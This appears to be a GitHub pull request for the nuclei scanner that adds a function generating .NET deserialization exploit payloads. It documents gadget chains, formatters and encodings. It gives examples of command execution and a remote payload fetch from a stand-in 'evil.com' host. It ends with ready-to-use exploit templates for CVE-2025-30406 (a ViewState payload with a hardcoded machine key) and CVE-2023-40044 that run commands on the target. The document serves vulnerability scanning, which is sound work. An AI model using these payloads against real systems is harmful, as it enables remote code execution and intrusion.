feat: added support for dotnet deserialization gadget generation

[Ice3man543]

Deserialization Gadget Generators

This PR provides unified functions for generating Java and .NET deserialization exploit payloads.

Uses: https://www.vulncheck.com/blog/making-dotnet-gadgets
Based on code in https://github.com/vulncheck-oss/go-exploit/tree/main/dotnet

.NET Deserialization

Function Signature

generate_dotnet_gadget(gadget, cmd, formatter, encoding string) string

Parameters

• gadget: The gadget chain to use
• cmd: Command, URL, or data (depends on gadget type)
• formatter: Serialization formatter to use (defaults to BinaryFormatter)
• encoding: Output encoding format (defaults to URL-safe base64)

Supported Gadgets

Command-Based Gadgets

These gadgets execute system commands:

• windows-identity - WindowsIdentity gadget
• claims-principal - ClaimsPrincipal gadget
• dataset - DataSet gadget
• dataset-type-spoof - DataSet with type spoofing
• object-data-provider - ObjectDataProvider gadget
• text-formatting-runproperties - TextFormattingRunProperties gadget
• type-confuse-delegate - TypeConfuseDelegate gadget

cmd format: Command to execute (e.g., "calc", "whoami", "cmd /c dir")

URL-Based Gadgets

These gadgets make HTTP requests to fetch remote payloads:

• object-ref - Remote object reference
• veeam-crypto-keyinfo - Veeam CryptoKeyInfo gadget

cmd format: URL (e.g., "http://attacker.com/payload")

XML-Based Gadgets

• dataset-xmldiffgram - DataSet XML DiffGram

cmd format: XML payload data

DLL-Based Gadgets

• axhost-state-dll - AxHostState DLL loading
• dll-reflection - DLL reflection loading

cmd format: Raw DLL bytes or base64-encoded DLL

ViewState Gadget

• viewstate - ASP.NET ViewState

cmd format: "payloadData:machineKey:generator" (colon-separated)

Prebuilt Gadgets

Any other gadget name will attempt to load from the dotnet package's embedded gadgets using ReadGadget.

Supported Formatters

• binary or binaryformatter - BinaryFormatter (default)
• soap or soapformatter - SOAPFormatter
• soapwithexceptions or soap-exceptions - SOAPFormatter with exceptions
• los or losformatter - LOSFormatter
• Empty string - defaults to BinaryFormatter

Supported Encodings

• raw - Raw binary string
• hex - Hexadecimal encoding
• gzip - Gzip compressed
• gzip-base64 - Gzip + URL-safe base64
• base64-raw - Standard base64
• Empty string - URL-safe base64 (default, replaces + with %2B)

Examples

// Windows command execution with BinaryFormatter
payload := generate_dotnet_gadget("windows-identity", "calc", "binary", "base64-raw")

// Remote payload fetch with SOAPFormatter  
payload := generate_dotnet_gadget("object-ref", "http://evil.com/payload", "soap", "hex")

// PowerShell execution with default formatter and encoding
payload := generate_dotnet_gadget("claims-principal", "powershell -enc <base64>", "", "")

// ViewState gadget
payload := generate_dotnet_gadget("viewstate", "data:machineKey:generator", "", "base64-raw")

[Ice3man543]

projectdiscovery/nuclei#4204 - requested here originally

Example usages:

For CVE-2025-30406 which currently uses hardcoded gadget: (verified working with OOB)

variables:
  inner_payload: '{{generate_dotnet_gadget("text-formatting-runproperties", "powershell nslookup {{interactsh-url}}", "los", "base64-raw")}}'
  viewstate_payload: '{{generate_dotnet_gadget("viewstate", inner_payload + ":5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16:3FE2630A", "", "base64-raw")}}'

http:
  - raw:
      - |
        POST /portal/loginpage.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __LASTFOCUS=&__VIEWSTATE={{url_encode(viewstate_payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
        condition: and

For CVE-2023-40044: (This one yet to verify)

  - raw:
      - |
        POST /AHT/AhtApiService.asmx/AuthUser HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name=""

        ::AHT_DEFAULT_UPLOAD_PARAMETER::{{generate_dotnet_gadget("type-confuse-delegate", "cmd.exe /C nslookup {{interactsh-url}}", "binary", "base64-raw")}}
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

[dwisiswant0]

banger